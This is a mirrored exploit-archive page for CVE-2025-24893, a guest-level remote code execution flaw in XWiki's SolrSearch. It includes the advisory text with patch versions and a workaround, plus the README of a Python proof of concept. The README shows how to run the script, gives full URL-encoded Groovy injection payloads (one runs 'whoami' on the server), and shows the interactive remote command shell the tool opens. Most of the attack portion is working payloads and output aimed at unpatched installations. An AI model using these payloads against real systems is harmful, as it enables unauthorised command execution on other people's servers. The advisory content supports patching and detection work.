Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-24893 PoC — Remote code execution as guest via SolrSearchMacros request in xwiki

Source
https://github.com/Y2F05p2w/CVE-2025-24893
Associated Vulnerability
Title:Remote code execution as guest via SolrSearchMacros request in xwiki (CVE-2025-24893)
Description:XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any guest can perform arbitrary remote code execution through a request to `SolrSearch`. This impacts the confidentiality, integrity and availability of the whole XWiki installation. To reproduce on an instance, without being logged in, go to `<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20`. If there is an output, and the title of the RSS feed contains `Hello from search text:42`, then the instance is vulnerable. This vulnerability has been patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1. Users are advised to upgrade. Users unable to upgrade may edit `Main.SolrSearchMacros` in `SolrSearchMacros.xml` on line 955 to match the `rawResponse` macro in `macros.vm#L2824` with a content type of `application/xml`, instead of simply outputting the content of the feed.
Readme
## Infos

This PoC first tests for the SSTI and if it works.
It will go in loop and allows you to run commands remotly.

The `exec` and `shell` command do the same currently.



## Usage
### Connecting
```bash
python3 poc.py <target>
```

## Example
### With debug set to False (default)
```bash
python3 poc.py http://127.0.0.1:8080
[*] Targeting http://127.0.0.1:8080
[+] Target is vulnerable!
(xwiki-shell) > help

Documented commands (type help <topic>):
========================================
exec  exit  help  shell

(xwiki-shell) > exec whoami
xwiki
```

### With debug set to True
The debug flag at the top of the script will show you the generated urls.
It will create a debug.log file in which contains the raw response of the request.

```bash
python3 poc.py http://127.0.0.1:8080
[*] Targeting http://127.0.0.1:8080
[DEBUG] URL used: http://127.0.0.1:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22XWIKI_TEST_123%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Response content-type: application/rss+xml;charset=utf-8
[+] Target is vulnerable!
(xwiki-shell) > help

Documented commands (type help <topic>):
========================================
exec  exit  help  shell

(xwiki-shell) > exec whoami
[DEBUG] URL used: http://127.0.0.1:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22whoami%22.execute%28%29.text%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Response content-type: application/rss+xml;charset=utf-8
xwiki
```
File Snapshot

 [4.0K]  /data/pocs/a78ecf51dc71224eca2fef0d09779fccd86da84f
├── [ 10K]  poc.py
└── [1.6K]  README.md

1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →